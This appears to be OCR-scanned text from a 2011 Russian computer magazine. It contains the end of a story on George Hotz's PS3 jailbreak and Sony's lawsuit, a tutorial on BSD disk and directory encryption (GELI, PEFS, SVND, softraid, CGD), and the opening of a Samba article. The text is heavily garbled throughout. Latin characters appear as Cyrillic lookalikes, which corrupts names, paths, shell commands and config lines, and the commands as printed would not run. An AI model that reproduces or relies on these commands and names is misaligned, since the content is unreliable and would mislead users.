ственную прошивку, в которой Біпих и «ОібегОЗ» будут доступны. 
Этот «обмен любезностями» произошел в марте, а уже через месяц 
ОеоНоІ опубликовал в Сети видео, на котором РІауЗіабоп 3 с про- 
шивкой 3.21 на борту, как ни в чем ни бывало, демонстрировала 
работу «ОібегОЗ». Джордж подчеркнул, что его кастомная про- 
шивка, получившая имя 3.2100, заработает и на самых последних 
Зііт-версиях приставки. Дату релиза он, однако, не назвал. Как 
оказалось — не зря, прошивка так и не увидела свет, и начина- 
ние потихоньку заглохло. В какой-то момент вообще казалось, что 
последней вестью с полей так и останется твитХотца, датирован- 
ный июлем 2010. Хакер писал, что Р53 слишком крепкий орешек, и 
он уже почти не надеется продвинуться дальше со своим взломом. 
За вышеупомянутым твитом последовало более полугода тишины. 
Злопыхатели уже праздновали победу и потирали руки (как же, 

Хотц наконец-то облажался!), когда появилось новое сообщение 
от ѲеоНоОа. Оказалось, эти шесть месяцев он не сидел без дела и 
к январю 201 1 сумел продемонстрировать ЬотеЬгеѵѵ приложение, 
запущенное на Р53 с прошивкой 3.55. И это без донглов — чистый 
софтверный взлом, базой для которого послужил эксплойт, обнару- 
женный командой РаіШѵегйоѵѵ. Эти ребята занимались изучением 
вопроса шифрования в консолях Зопу и добились определенно- 
го успеха. На конференции СЬаоз Соттипісаііоп Сопдгезз они 
показали полностью взломанную приставку и рассказали, что 
обнаружили баг в системе подписи лицензионного обеспечения, 
исправить который с помощью новой прошивки у Зопу не выйдет. 
Подчеркиваем — показана была только видео-демонстрация с 
описанием процесса. Очевидно, ее-то и посмотрел ОеоНоО а в его 
руках подробности о ключе шифрования стали серьезным козырем. 
Еще день спустя Хотц подбросил дров в разгоравшийся в Сети 
костер споров, продемонстрировав еще одно видео — на этот 
раз ЬоппеЬгеѵѵ-приложения работали на модифицированной про- 
шивке 3.55. На еобоЕсот он опубликовал свой джейлбрейк (а 
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Тот самый первый іРЬопе, взломанный Хотцем. 

Это его он обменял на машину и три новых смартфона 



также гоо(кеу-приставки), позволяющий проделать то же самое 
всем и каждому. В ответ на это Зопу подала в суд. 21 января 
201 1 года Зопу Сопприіег Епіегіаіптепі Атегіса обратилась в 
Калифорнийский суд с иском в адрес Джорджа Хотца и еще восьми 
человек — ребят из РаіШѵегТІоѵѵ и «неустановленных личностей» — 
заявляя, что они нарушают ОМСА (закон об авторском праве в циф- 
ровую эпоху), являются компьютерными мошенниками и нарушите- 
лями авторских прав. Окружной судья Сьюзан Иллстон (очевидно, 
разделяющая точку зрения Зопу) 27 января постановила, что ОеоНоІ 
и компания обязаны передать все свои консоли и жесткие диски 
в руки юристов, а также немедленно прекратить распространять 
инструменты для взлома РІауЗіабоп 3. По сути, суд удовлетворил 
прошение Зопу о так называемом «Іетрогагу гезігаіпіпд огсіег» — 
это судебный приказ о временном запрещении чего-либо. Запрет 
продлится до принятия окончательного решения по иску. 

И вот тут-то и начинаются странности. Во-первых, суд проходил 
в Северной Калифорнии, а Хотц проживает в Нью-Джерси, так 
что судить и даже обвинять его в Калифорнии не имели права. 
Во-вторых, как уже упоминалось выше, недавно были приняты 
поправки в ОМСА, согласно которым джейлбрейк — легален, и люди 
вправе делать с техникой, которую они законно приобрели, все, что 
им заблагорассудится. В законе, правда, как всегда есть нюанс. В 
тексте речь идет конкретно о мобильных телефонах, но Хотц и его 
адвокаты настаивают, что с определенной точки зрения смартфоны 
и приставки довольно близки друг к другу, и если можно взламы- 
вать одно, то можно и другое. В-третьих, сам ОеоНоІ и парни из 
РаіЮѵегбІоѵѵ подчеркивают, что они были, есть и будут противниками 
пиратства. Свои изыскания они проводили исключительно с целью 
запускать на консоли І_іпих и ЬотеЬгеѵѵ-приложения, что опреде- 
ленно не является криминалом. Если буквально, то Хотц сделал ути- 
литу, позволяющую запускать на Р53 неподписанный код. 

Однако разозленный медиагигант — страшная сила. 5опу реально 
верит в возможность ликвидации джейлбрейка в Сети, и продол- 
жает бороться. Недавно компания в судебном порядке принялась 
штурмовать УоиТиЬе, Тѵѵіиег, Воодіе, РауРаІ и сайты вроде ЗІазМоІ:, 
Кіскзіагіег и ОііЬиЬ. Зачем? В поисках информации о других хакерах, 
причастных ко взлому и распространению ценных секретных данных. 
Судя по всему, не безрезультатно, так как повестки начали приходить 
даже людям, которые просто просматривали видео-демонстрацию 
РаіЮѵегбІоѵѵ на УоиТиЬе! Команда, кстати, вынуждена была закрыть 
свой сайт (аіІОѵегйоѵѵ.сопп и вывесить на главной странице преду- 
преждение, что вся сетевая активность ими прекращена, а ѴоиТиЬе- 
каналы или ЕасеЬоок-аккаунты имени их группы заведены мошенни- 
ками, которые пытаются выклянчить немного денег у сердобольной 
публики. Затем Зопу организовала массовую рассылку, в которой 
недвусмысленно напомнила пользователям, что использование 
устройств взлома является нарушением пользовательского согла- 
шения. За непослушание компания грозит юзерам вечным баном и 
отключением от сервисов РІауЗіабоп Ыеіѵѵогк и Огіосііу. 




Старое фото: Хотц на І5ЕР 2005 со своим проектом 
«ТЬе боодіег» 



И только Джордж Хотц не сдается. Парень нанял двух адвокатов, сбор 
средств на услуги которых проходил в Сети (кстати, нужная сумма 
была собрана за рекордные восемнадцать часов). ОеоНоба без пре- 
увеличения поддержал весь мир — например, ему предложила без- 
возмездную помощь компания Еіесігопіс Егопбег Еоипбабоп. Нанятые 
Джорджем юристы теперь настаивают, что обвинения Зопу беспочвен- 
ны, их подзащитный не «хакер», и консоль он вовсе не взламывал, 
а лишь активировал упраздненные ранее функции. Также, по совету 
своих адвокатов, ОеоНоІ пока отказывается передавать на экспертизу 
свой компьютер (ссылаясь на то, что зарабатывает на жизнь програм- 
мированием) и категорически отрицает связь с командой ЕаіЮѵе гбіоѵѵ. 
Не чурается Хотц и внимания СМИ — напротив, на его сайте сейчас 
висит призыв к прессе распространять информацию об этой истории 
как можно шире. Он также выступает за бойкотирование Зопу (не 
покупать игры, не качать 01_С, не пользоваться услугами Р5І\І), обви- 
няет компанию в незаконном сборе личных данных о пользователях и 
недостаточной защите этих самых данных. Недавно Джордж появил- 
ся в эфире канала 64, где на вопрос ведущего «Почему Зопу так рьяно 
бросилась на борьбу с тобой, за что они тебя судят, как ты считаешь?» 
с ухмылкой ответил «Я просто их разозлил». 

Не похоже, чтобы ОеоНоІ унывал. Напротив, кажется, в центре этой 
заварушки он чувствует себя, как рыба в воде. Джордж развернул 
в Сети настоящую военную кампанию — например, на очеред- 
ные выпады Зопу он недавно ответил бодрым матерным рэпом на 
УоиТиЬе. У ролика уже больше полутора миллионов просмотров, а в 
песне ОеоНоІ фактически объявляет себя «воплощением свободы 
для всех» :). По случаю Хотц реанимировал и свой блог, в котором 
теперь публикуется оперативная хроника происходящего и мысли 
автора. Так что на деоЬоТсот можно найти все документы, факты, 
явки и пароли, связанные с этой историй. 

Как это противостояние будет развиваться дальше — скоро узнаем. 
Пока точно можно сказать лишь одно — Джордж Хотц не намерен 
сдаваться без боя и уверен в своей правоте. И его, кстати, поддер- 
живают уже не только компании и абстрактные сетевые массы, но и 
вполне конкретные уважаемые люди. Яркий тому пример — профес- 
сор университета Карнеги-Меллон Дэвид Турецки. Хватит ли всего 
этого, чтобы победить корпорацию? Кто знает... т 
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ІШІХОЮ 



■ ■ Евгений Зобнин (гоЬпіпгадтаіІ.сот) 




ЗАПИСКИ 

КРИПТОНАВТА— 

Осваиваем защиту данных в В5Р 

• Уже несколько раз мы писали о настройке шифрования дисков в 
ІЖІХ, но каждый раз концентрировали внимание на инструментах, 
доступных в Ыпих, обходя стороной ВЗР-системы. В этой статье я 
попытаюсь исправить этот недочет, рассказав о последних ново- 
введениях систем шифрования, появившихся во ГгееВЗО и ОрепВЗВ. 



Ситуация в мире шифрующего ПО для ВБО-систем далеко нетакая 
интересная и захватывающая, какв Ыпих. Здесь нет большого раз- 
нообразия сторонних коммерческих систем, нет постоянного флейма 
на тему уязвимостей тех или иных реализаций, нет сторонних патчей 
для ядра. Каждая из операционных систем уже давно обладает одной 
или несколькими реализациями шифрующих подсистем, хорошо до- 
кументированных в тап-страницах и официально поддерживаемых 
разработчиками ОС. Но даже в таком идеальном мире должны проис- 
ходить перемены, свидетелями которых мы и стали совсем недавно. 
Особо отличились разработчики ЕгееВБО, которые в конце 2010 года 
включили в разрабатываемую ветку ОС сразу два нововведения: 
доработанную реализацию ОЕОМ-класса 6ЕІ_І, которыйтеперь ис- 
пользует современный (и пока еще нескомпрометированный] метод 
шифрования ХТ5 и стековую шифрующую файловую систему РЕЕ5, 
предназначенную для шифрования отдельно взятых каталогов. Не- 
много раньше отметились мантейнеры ОрепВБО, которые интегриро- 



вали поддержку шифрования в драйвер зо^гаісі, предназначенный 
для создания программных РАЮ-массивов. В этой статье мы рас- 
смотрим все три шифрующие системы, ихустройство, возможности и 
способы применения. 

СЕЦ: чертовски классное 
шифрование 

ОЁ1_1 появился еще в шестой версии ЕгееВБО, но довольно продол- 
жительное время оставался втени благодаря существованиютысяч 
устаревших документов и статей, написанных во времена четверки- 
пятерки и рекомендовавших использовать для шифрования другие 
средства. Сегодня ѲЕІ_І — это ЕгееВБО-стандарт дискового шифрова- 
ния, рекомендованный киспользованию в абсолютном большинстве 
случаев. И появившаяся нетакдавно поддержка метода шифрования 
ХТБтолько подтверждает это (отом, почемуХТБтак важен, читай во 
врезке). 
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Замеры производительности, опубликованные на деекузсЬтісИсот: 5ѴШ медленнее сгуріо зойгаісі, к тому же 
жрет больше процессорного времени 




ХТ5: в чем профит? 



Первые криптографические системы использовали простое 
поблочное шифрование данных с помощью заданного 
пользователем ключа. Блок данных просто извлекался из памяти, 
шифровался и записывался обратно, то же самое происходило со 
следующим блоком и всеми остальными. Практически сразу была 
найдена проблема такого подхода, которая заключалась в очень 
простом способе предугадывания хранимых в контейнере данных 
через сравнение разных шифрованных блоков. Чтобы решить 
проблему, были придуманы разные режимы шифрования, которые 
позволяли сделать результат шифрования даже одинаковых блоков 
данных уникальным. Самым распространенным из них стал режим 
СВС (Сірбег Віоск СЬаіпіпд], который побитно ХОВ'ил каждый 
следующий шифруемый блоке предыдущим так, чтобы на выходе 
получался уникальный результат. Однако у СВС тоже было несколько 
проблем, которые позволяли применить против него различные 
виды атак, таких как тиШзсап, ѵѵаіегтагкіпд и атак на подмену. 

Другие изобретенные режимы шифрования также оказались в той 
или иной мере подвержены этим и другим видам атак, и сегодня 
осталось всего несколько режимов, уязвимость которых еще не 
была доказана. И самый эффективный из них носит имя ХТ5. 

ОЕБІ представляетсобой класс модульной подсистемы дискового 
ввода-вывода ѲЕОМ, что в переводе на русский означает«специаль- 
ный модуль, пропускающий через себя запросы ввода-вывода». Мо- 
дуль можно подсунуть в уже существующий «пирог» из других подоб- 
ных модулей, получив в результате шифрование данных на любом из 
уровней этого пирога. Так можно криптануть« голый» жесткий диск, 
раздел диска, файл, подключенный в качестве блочного устройства, 
сетевой диск и даже уже зашифрованный диск (подробнее об этом 
и многих других прелестях 6Е0М читай в моей статье «Заниматель- 
ная ОЕОМ'етрия», опубликованной в 96-м номере ЗЕ). Класс 6ЕБІ 
поддерживает несколько алгоритмов шифрования (АЕБ, ВІоѵѵбзЬ и 
ЗБЕ5) с разной длиной ключа, умеет работать с хардварными крип- 
тографическими устройствами, может шифровать ко рневой раздел, 
поддерживает двойные ключи (например, можно создать личный и 
корпоративный ключи, и они оба будут использованы для шифрова- 
ния диска), атакже одноразовые ключи (для шифрования разделов с 
временными данными, таких какДтр и зѵѵар). Помимо уже упомя- 
нутого ХТ8, не та к давно ОЕБІ обзавелся возможностью шифровать 
данные с использованием нескольких ключей, каждый из которых 
применяется для шифрования своего набора блоков (с применением 
ключей по кругу), что обеспечивает еще более надежную защиту от 
различных видов атак (до ОЕБІ такая возможность была доступна 
только в линуксовом Іоор-аез). Пока обновленный ОЕБІ недоступен в 
стабильной версии ЕгееВЗР, и для его установки придется получить 



В стиле Упіх-ѵѵау 



Ключ ОЕБІ можно спокойно разделить на несколько частей с 
помощью команды зрІіШ), а затем объединить их и передать команде 
деіі на стандартный вход: 

# с а* кеубіеі кеу61е2 кеубІеЗ | §е1і іпіі: -К - /сІеѵ/сІа2 



Зашифрованная 

виртуальность 



В отличие от всех остальных представленных систем, ОрепВЗБ 
производит шифрование свопа по дефолту: 

% зуБСіІ -а | §гер змарепс | беасі -пі 
ѵт . зыарепегурі: . епаЫе=1 

и собрать исходники сиггепі-ветки ЕгееВБй или скачать и устано- 
вить 150-образ девятки отсюда: Бр://Бр.1тееЬ5сІ.огд/риЬ/БгееВ5Р/ 
зпарзбо1:5/201 101, . Не задействуя новые возможности, его вполне 
можно использовать в шестой, седьмой и восьмой версиях системы. 
ОЕБІ реализован в виде ядерного модуля деот_еІі, который можно 
загрузить прямо во время работы системы: 

# кісііоасі §еот_е1і.ко 

Или заставить делать это в автоматическом режиме: 

# есбо 1 §еот_е1і_1оасI= ,, УЕ5 ,, ' >> /Ьооі/Іоасіег . соігР 

После этого необходимо сгенерировать ключ (заБ), который будет ну- 
жен для шифрования мастер- ключа, применяемого для шифрования 
самих данных. Сделать это можно с помощью следующей команды: 

# сісі і-р=/сІеѵ/гапсІот о-Р=~/асІ1 . кеу Ьз=64 соип1:=1 

Далее необходимо инициализировать блочное устройство, которое 
потребуется для хранения зашифрованных данных: 

# §е1і іпіі: -5 4096 -К ~/асІ1.кеу -е АЕ5 \ 

-а бтас/БІіа512 -1 256 /сіеѵ/асіі 

Опция '-з' используется для указания длины блока (лучше использо- 
вать значение 4096 (4 Кб), оно совпадаете размером блока файловой 
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РгееВЗй 9.0 использует режим шифрования ХТ5 по 
умолчанию 



Ь І.Б 
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Ошибку загрузки ОрепВБР с зашифрованного диска 
легко исправить с помощью одной команды 



системы и поэтому позволит 6ЕІ_І работать с максимальной произ- 
водительностью), опция '-К' задаетпуть до сгенерированного ранее 
ключа, опция ’-е' — алгоритм шифрования, '-а' — алгоритм контроля 
целостности, '-Г — длину ключа для алгоритма шифрования. 

В конце указывается подопытное блочное устройство. Замечу, что ни 
одна из опций не является обязательной, и для выбора дефолтовых 
значений (256-битный АЕ5 без контроля целостности) мы могли бы 
указать только опцию '-К'. 

Кроме того, 6 ЕЫ не позволяет напрямую выбирать режим шифро- 
вания, поэтому во всех версиях ОС вплоть до девятой будетисполь- 
зован режим С ВС, а в девятой — ХТ5. Команда запросит пароль, 
который вместе с ключом будет использован для генерации мастер- 
ключа (для доступа к данным понадобится и то, и другое). После этого 
можно подключить 0ЕІ_І кустройству, чтобы начать его использовать: 

# §е1і аііасб -к ~/асІ1.кеу /сіеѵ/асіі 

После ввода пароля в каталоге/беѵ появится файл /беѵ/абі .еіі, на 
котором можно создать файловую систему и смонтировать ее: 

# сісі і-р=/сІеѵ/гапсІот оі=/сІеѵ/асІ1 . еіі Ьз=64к 

# пеыіз /сіеѵ/асіі. еіі 

# тоипі /сіеѵ/асіі . еіі /тпі 

Размонтирование и отключение 0ЕІ_І происходит в обратном по- 
рядке: 

# игпошті: /тпі: 

# §е1і сіеіасб асіі.еіі 

Чтобы вновь получить доступ кзашифрованным данным, достаточно 
снова набратьдве простые команды и ввести пароль: 

# §е1і аііасіі -к ~/асІ1.кеу /сіеѵ/асіі 

# тоипі /сіеѵ/асіі. еіі /тпі 

Само собой разумеется, что файл-ключ асіі .кеу лучше не хранить в 
домашнем каталоге, а поместить на флешку. 

Чтобы шифрованный диск автоматически монтировался во время за- 
грузки, необходимо изменить несколько конфигов. Файл /Ьооі/Іоасіег. 
сопі 1 должен содержать следующие строки: 

§е1і_асI1_кеу1^1е0_1оасI= ,, УЕ5 ,, 

§е1і_асИ_кеуРі1е0_іуре= ,, асІ1 і^еі^кеуіііеѳ" 
§е1і_асИ_кеуРі1е0_пате= ,, /Ьооі/асІ1 . кеу" 

Афайл /еІсЛзІаЬ нужно изменить так, чтобы имя блочного устройства 
содержало суффикс «.еіі». Например: 

/сіеѵ/асіі. еіі /боте иіз гы 2 2 



Если шифруемый диск не является системным (не содержит в себе 
корневой каталог), его автоподключение можно настроить с помо- 
щью файла /е1с/гс.соп[ вместо /Ьооі/ІоасІег.сопЕ 

^еіі^еѵісез^'асіі" 

§е1і_асІ05І§_Ла§5=" -к /еіс/§е1і/асІ1 . кеу" 
§е1і_асі05І§_аиіобеіасІі="І\ІО" 

Для шифрования разделов с временными данными 0ЕІ_І позволяет 
использовать одноразовые ключи, автоматически генерируемые во 
время подключения устройства: 

# сісі іі=/сІеѵ/гапсІот оі=/сІеѵ/асІ05ІЬ Ьз=64к 

# §е1і опеііте -сі асІѲзІЬ 

# зыароп /сІеѵ/асІ05ІЬ.е1і 

Но если необходимо включать шифрование зѵѵар при каждой загруз- 
ке, то никаких команд выполнять не требуется. Достаточно просто до- 
бавить суффикс «.еіі» к имени зѵѵар- раздела в/еІсЛзІаЬ, и загрузоч- 
ные скрипты сделают всю грязную работу за тебя. Например: 

/сІеѵ/асІ05ІЬ. еіі попе зыар зы 0 0 

РЕР5: файлы решают все 

Шифрующая файловая система РЕЕЗ была добавлена во ЕгееВЗО 
практически одновременно с обновлением О ЕЫ, однако ее назначе- 
ние совсем иное. 

По своим характеристикам она гораздо ближе кІЛзе-ФС епсі'з 
( епсІФ.зіпеі ). чем ксистеме шифрования блочныхустройств. РЕЕ5 
работает поверх существующей файловой системы и нетребует 
гооі-привилегий, что делаетее идеальным решением для защиты 
пользовательских паролей, ключей, сертификатов и другой личной 
информации. 

РЕР5 достаточно проста, но втоже время обладает отличными харак- 
теристиками: 

• работает внутри ядра, что в теории должно сделать ее быстрее 
аналогов, использующих Фзе; 

• использует случайные векторы инициализации для каждого файла, 
благодаря чему две зашифрованные копии одного и того же файла 
будут выглядеть совершенно по-разному; 

• сохраняет размер шифруемого файла (что, однако, можно исполь- 
зовать для предугадывания его содержимого); 

• поддерживает произвольное число ключей и смешивание файлов, 
зашифрованных разными ключами в одном каталоге, а также позво- 
ляет сменить ключ для уже зашифрованного файла; 

• поддерживаеталгоритмы шифрования АЕ5, Саппеіііа и 5а1за20; 

• поддерживает режим шифрования ХТ5; 

• поддерживает«рассеивания» содержимого файлов; 

• работает поверх файловых систем ІІЕ5, 2Е5 и ехі2 ; 



► 086 
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Каждый важный компонент ФС должен иметь соб- 
ственный слайс в шифруемом ВАЮ-томе 



• добавляете систему РАМ-модуль для аутентификации пользовате- 
лей по хранимому в файловой системе ключу. 

РЕЕБуже полностью готова к использованию и успешно проходит 
тесты !зх, рісКзІезІ:, ЫодЬепсЬ и бЬепсб. 

Все выполненные разработчиками и энтузиастами замеры по- 
казывают примерно двукратное отставание производительности 
по сравнению с голой файловой системой II Е5. Как и ОЕЫ, РЕЕ5 
будет доступна только в девятой версии ЕгееВБО, но пощупать ее 
можно будет уже сейчас, необходимо только скачать исходники и 
собрать ИХ: 

# рогЬіпз'ЬаІІ §І1: 

# §І1: сіопе §і1:://§і1:ІіиЬ.сот/§1к/ре-р5.§і1: ре-Рз 

# сб ре-Рз 

# таке оЬд аіі 

# таке іпзііаіі 

# таке сіеап 

Далее можно протестировать новую разработку. Для этого необходи- 
мо создать новый каталог (назовем его зесиге): 

# ткбіг ~/зесиге 

Смонтировать РЕЕ5 поверх этого каталога. Поумолчанию эта опера- 
ция требует права суперпользователя, но присвоив переменной ядра 
ѵію.изегтоипі значение 1 , можно снять та кое ограничение (зузсИ -ѵѵ 
ѵт.изегтоип1;=1 ). 

# ре-Рз тоипі: ~/зесиге ~/зесиге 

Каталог останется доступным в режиме чтения. Чтобы получить воз- 
можностьзаписи с шифрованием, необходимо создать ключ (здесь 
же можно задать алгоритм шифрования: поумолчанию РЕЕ5 исполь- 
зует 256-битный АЕ5 и режим шифрования СТР, номы изменим эти 
предустановки): 

# ре-Рз аббкеу -а аез256-х1:5 ~/зесиге 

Далее можно проверить, что ключ был добавлен успешно: 

# ре-Рз збоыкеуз ~/зесиге 

И протестировать файловую систему: 

# есбо "Ѵегу ргіѵаѣе баіа" > ~/зесиге/1:е5І: 

# с а* ~/зесиге/1:е5І: 

Ѵегу рпіѵа1:е баііа 

# ре-Рз иптоигтР ~/зесиге 

# 1з -1 ~/зесиге 
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Создать крипто-контейнер с помощью 5ѴЫй действи- 
тельно просто 

ОрепВБО: о шифровании 
в двух томах 

Долгое время в ОрепВБО существовала только одна стандартная 
подсистема шифрования дисков под названием 5ѴІ\Ю (Ваію Ѵпобе 
Оізк Огіѵег), реализованная с помощью дополнительной прослойки 
для подключения дисковых устройств поверх другдруга. Однако в 
версии 4.4, вышедшей в конце 2008 года, в дополнение к ней появи- 
лась более «честная» поддержка шифрования с помощью фрейм- 
ворка зоіігаіб, и пользователи обрели альтернативу, что привело к 
разгару дискуссий на тему: «что лучше»? Дискуссии длятся до сих 
пор, но я не собираюсь поддерживать ту или иную реализацию. С 
практической точки зрения обе системы достойны того, чтобы со- 
существовать параллельно и применяться для различных целей. 
5ѴІ\Ю очень проста в использовании и может быть применена в лю- 
бой момент к любому устройству или файлу на диске, с ее помощью 
возможно удобно и быстро создавать крипто-контейнеры, которые 
также просто уничтожить и забыть об их существовании. 

Система сгуріо зоИгаіб является частью софтверного РАЮ-драйвера, 
а потому сложнее в настройке, но более проста в плане сопровожде- 
ния уже существующих крипто-дисков и защиты отсбоев. Заложен- 
ный в нее алгоритм шифрования «чище», безопаснее и производи- 
тельнее своего аналога из 5ѴІ\Ю. Никаких других выводов в пользу 
5ѴІ\Ю или сгуріо зоіігаіб у меня нет, поэтому мы рассмотрим оба 
варианта. Начнем с более простого, ЗѴІЧй. В ОрепВБО (как, впрочем, 
и во всех остальных В50) есть псевдо-драйвер ѵпб(4), позволяющий 
отображать обычные файлы или блочные устройства в новыеблоч- 
ныеустройства и, как следствие, монтировать их стандартным об- 
разом. 5ѴІ\Ш представляетсобой неболь шую прослойку, встроенную 
в этот драйвер и позволяющую производить шифрование блочных 
устройств во время их отображения. 

Для работы с такими устройствами применяется утилита ѵпсопбд(8), 
которая будет нашим основным инструментом. Кроме нее понадобит- 
ся соль и образ, который будетхранитьзашифрованные данные. Их 
можно создать с помощью команды бб: 

# бб і-р=/беѵ/агапбот о-р=/1:тр/сгур1:о. заіі: сошгЬ=1 

# бб і-р=/беѵ/іего о-Р=/1:тр/сгур1:о. іт§ Ьз=1т соіт1:=1024 

Далее образ можно отобразить в блочное устройство: 

# ѵпсоп1і§ -с -К 2000 -5 /Ітр/сгуріо. заіі: /беѵ/зѵпб0с \ 
/Ітр/сгуріо. іт§ 

В ответ на запрос вводим пароль и получаем устройство зѵпбО в ката- 
логе /беѵ. Его можно превратить в настоящий диске помощью записи 
МВР и таблицы ВБО-разделов (на самом деле, это не обязательно, 
файловую систему можно создать прямо на/беѵ/зѵпбОс): 

# -Рбізк -іу зѵпбѲ 

# бізкІаЬеІ -Е зѵпбѲ 
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ІШІХОЮ 



Вводим команды «а а», «ѵѵ» и «ц», на любые вопросы отвечаем на- 
жатием <ЕпІег>. Получаем раздел «а», на нем можно создать новую 
файловую систему и смонтировать ее: 

# пем-Рз /сІеѵ/пБѵпсІѲа 

# тоипі /сІеѵ/зѵпсІѲа /тпі 

После заливки файлов в контейнер размонтируем его и уничтожим 
шифрующее блочное устройство: 

# итоипі /тпі: 

# ѵпсоп6§ -и зѵпсІѲ 

Смонтировать контейнер снова можно так: 

# ѵпсоп6§ -с -К 2000 -5 /ітр/сгуріо. за 11: /сІеѵ/зѵпсІѲ \ 
/ітр/сгуріо. іт§ 

# тоипі: /сІеѵ/зѵпсІѲа /тпі: 

С механизмом сгуріо зоіігаісі все несколько сложнее. Мы будем 
использовать его возможности для создания зашифрованной 
файловой системы защищенного ноута или сервера. Для этого нам 
понадобится установочный дискОрепБЭй версии не ниже4.4. Загру- 
жаемся с компакт-диска. На вопрос инсталлятора о способе загрузки 
набираем «5» и видим приглашение командного интерпретатора. 
Теперь нам нужно разметить дискта к, чтобы создать небольшой 
гооі-раздел (размером где-то 256 Мб), за ним поместить зѵѵар-раздел 
и добавить кэтому основной раздел, который будетзашифрован с 
помощью зоіігаісі. Делаем: 

# Тсіізк -іу мс10 

# сІізкІаЬеІ -Е ѵіс 10 

Вводим команду «а а» и давим <ЕпІег> в ответ на любые вопросы, 
кроме «5І2е» (в ответ на вопрос «зіге» вводим «256М »). Это корне- 
вой раздел. Далее набираем «а Ь», указываем размер своп-области 
(например, «10»), на остальные вопросы — <Еп1ег>. Вводим «а б», 
указываем нужный размер основного раздела или нажимаем <Еп1ег> 
(чтобы использовать весь диск), на вопрос о типе файловой системы 
(ЕЭіуре) отвечаем «РАЮ». Этого требует сгуріо зоіігаісі. Далее вво- 
дим стандартные «ѵѵ» и «ц». 

Чтобы активировать РАЮ-массив на разделе ѵѵсІОсІ (который на 
самом деле будетпростым зашифрованнымтомом), используем 
команду ЬіосЩ8): 

# Ьіосіі -с С -г 65536 -1 /беѵ/мсІ0сІ зоіігаісІѲ 

Дважды вводим пароль. Видим системное сообщение о появлении 
диска збО. Теперь можно запустить инсталлятор: 

# /іпзіаіі 

Отвечаем на стандартные вопросы, выбираем дискѵѵбО для установ- 
ки. На вопрос отом, какую часть диска мы хотим использовать (ІІзе 
(ѴѴ)ЬоІе бізк...), набираем «ѴѴ» — весь диск. На вопрос о раскладке 
диска (ІІзе (А)иіо Іауоиі...) отвечаем «С», вновь попадаем в бізкіабеі. 
Набираем «т а» (модификация раздела «а»), нажимаем <ЕпІег> 
на все вопросы, кроме «тоипі; роіпі» ( в ответна «тоипі роіпі» 
указываем «/»). Далее вводим команды «ѵѵ» и «ц». Теперь в системе 
должен остаться один неинициализированный дискзбО. Это наш 
крипто- РАЮ, выбираем его, а в ответ на следующий вопрос нажима- 
ем <ЕпІег>. Вновь попадаем в бізкіабеі, вводим «а а», задаем размер 
«256 М», в качестве точки монтирования указываем /а Игооі. Создаем 
дополнительные разделы для точек монтирования /изг, /ітр,/ѵаг, 
/гооі, /боте и так далее. Они будут располагаться на зашифро- 
ванном РАЮ-томе. Это все. Продолжаем отвечать на стандарт- 



ные вопросы инсталлятора, ждем установки и перезагружаемся. 

На этом можно было бы и закончить, но, каким бы странным это 
ни казалось, при загрузке система начнетзасыпатьтебя кучей 
сообщений об ошибке монтирования. Не стоит волноваться, это 
нормально, просто разработчики еще не успели обновить скрипты 
инициализации так, чтобы они научились определять наличие 
зашифрованных разделов и подключать их в автоматическом 
режиме. Скорее всего, в следующих версиях 0 реп ВЭй этот недо- 
чет исправят, и тебе потребуется только ввести пароль во время 
загрузки ОС, однако пока придется выходить из ситуации само- 
стоятельно. Нажми <Еп1ег> и подключи крипто-дискс помощью 
следующей команды: 

# Ьіос1:1 -с С -1 /беѵ/мб0б зоіігаісІѲ && ехіі 

Загрузка продолжится в нормальном режиме и все разделы будут без 
проблем подключены. Чтобы не загружать свой мозги руки вводом 
команды каждый раз, ее можно поместить в скрипт и вызывать при 
загрузке. 

ЫеШЗР: старикам здесь место 

Хоть эта статья и посвящена новым веяниям в области криптографии, 
мы никак не могли обойтись без описания того, что нам может пред- 
ложить ІЧеіВЭО. У нее тоже есть свой шифрующий драйвер — СО О 
(Сгуріодгарбіс йеѵісе ІЭпѵег), который хоть и не блещет количеством 
различных алгоритмов и методов шифрования, но исправно работает 
уже оченьдавно (когда то даже был портирован в ОрепВЭШ. 

Для его конфигурирования используется утилита сдбсопбд(8), кото- 
рая позволяет создать зашифрованный диск всего за два шага. Пер- 
вый шаг— генерирование конфигурационного файла для шифруе- 
мого устройства, он нужен для последующих вызовов утилиты (чтобы 
не вбивать все заново) и скриптов инициализации, подключающих 
доступные крипто-устройства во время загрузки (мы не будем рас- 
сматривать этот вариант). Создадим конфигдля флешки зсІО: 

# с§сісоп1й§ -§ -о /еіс/с§сІ/5СІ0 аез-сЬс 

Далее сконфигурируем псевдоустройство сдсІО, которое будет вы- 
ступать в качестве шифрующего бэк-энда к флешке, представленной 
устройством /сІеѵ/зсІО: 

# с§сісоп 6§ с§сІ0 /сІеѵ/зсІѲ 

После ввода пароля устройство будет готово к использованию. На 
нем можно создать файловую систему и смонтировать ее: 

# пеы-Рз /сІеѵ/с§сІ0 

# тоипі /сІеѵ/с§сІ0 /тпі 

По окончании работы размонтируем файловую систему и отключаем 
устройство сдсІО: 

# итоипі /сІеѵ/с§сІ0 

# с§сІсоп1й§ -и с§сІ0 

Чтобы вновь подключить флешку, выполняем две команды: 

# с§сісоп1й§ с§сІ0 /сІеѵ/зсІѲ 

# тоипі /сІеѵ/с§сІ0 /тпі 

Выводы 

ВЭй- системы не стоят на месте и постоянно развиваются. Техно- 
логии, считавшиеся стандартом несколько лет назад, отмирают, 
им на смену приходят новые. Отрадно видеть, что системы крипто- 
защиты данных прогрессируюттакже быстро. Пользуясь ВЭй, ты 
всегда будешь уверен в сохранности своих данных. ІНІ 



► 088 
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БРАЗИЛЬСКИЙ 
ТАНЕЦ С БУБНОМ 



Настройка, оптимизация работы и обеспечение 
безопасности ЗатЪа-клиента 

• В наши нелегкие времена, когда большинство пользователей 
сидит под виндой, обычному линуксоиду приходится подстраивать- 
ся под обстоятельства. Файл уже не передашь с помощью пс или 
№5, а документ не распечатаешь удаленно через СІІР5. Остается 
только использовать ЗашЬа, про тотальную настройку и оптимиза- 
цию которой я сейчас и расскажу. 



Ликвидация безграмотности 

БатЬа — это свободная программная реализация протокола 5МВ/ 
СІР5. Этот протокол, нэйтивно поддерживаемый семейством ОС 
ѴѴіпсІоѵѵз, позволяет получать удаленный доступ кфайлам и сетевым 
принтерам. В винде рядовой пользователь может повлиять лишь 
на минимум настроек, связанных с доступом, остальные же опции 
глубоко скрыты в реестре либо отсутствуют вовсе. В никсах протокол 
БМВ не является обязательным и не всегда доступен из коробки. 
Для его использования требуется установить клиентскую (для до- 
ступа куже расшаренным файлам и принтерам) и серверную (для 
